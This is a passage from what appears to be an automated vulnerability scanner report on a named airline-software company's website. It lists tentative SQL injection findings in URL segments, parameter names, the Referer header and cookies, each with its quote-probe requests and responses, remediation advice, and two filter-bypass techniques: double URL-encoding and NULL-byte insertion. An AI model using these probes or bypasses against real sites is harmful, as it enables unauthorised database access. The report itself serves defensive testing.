
Request 1

GET /home%2527/products_services/product/technical_records_hub HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 03:21:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home%2527%2527/products_services/product/technical_records_hub HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 03:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322892; expires=Thu, 06-Oct-2011 03:21:41 GMT; path=/
Set-Cookie: exp_last_activity=1286353300; expires=Thu, 06-Oct-2011 03:21:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/about/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.19. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/technical_records_hub/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services'/product/technical_records_hub/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services''/product/technical_records_hub/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322173; expires=Thu, 06-Oct-2011 02:24:48 GMT; path=/
Set-Cookie: exp_last_activity=1286349888; expires=Thu, 06-Oct-2011 02:24:48 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:24:51 GMT
Pragma: no-cache
Content-Length: 3983
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.20. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fleet_manager [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_fleet_manager

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/sabre_airvision_fleet_manager?1%00'=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:19:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_fleet_manager?1%00''=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:19:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322569; expires=Thu, 06-Oct-2011 04:19:22 GMT; path=/
Set-Cookie: exp_last_activity=1286356761; expires=Thu, 06-Oct-2011 04:19:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.21. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home%2527/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 04:17:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home%2527%2527/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:17:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:17:53 GMT; path=/
Set-Cookie: exp_last_activity=1286356673; expires=Thu, 06-Oct-2011 04:17:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/about/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.22. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:17:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:17:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:17:32 GMT; path=/
Set-Cookie: exp_last_activity=1286356652; expires=Thu, 06-Oct-2011 04:17:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.23. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:09:21 GMT; path=/
Set-Cookie: exp_last_activity=1286356159; expires=Thu, 06-Oct-2011 04:09:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.24. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_network_manager

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/sabre_airvision_network_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:18:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_network_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:18:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.25. http://www.sabreairlinesolutions.com/home/products_services/sabre_community_portal [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_community_portal

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

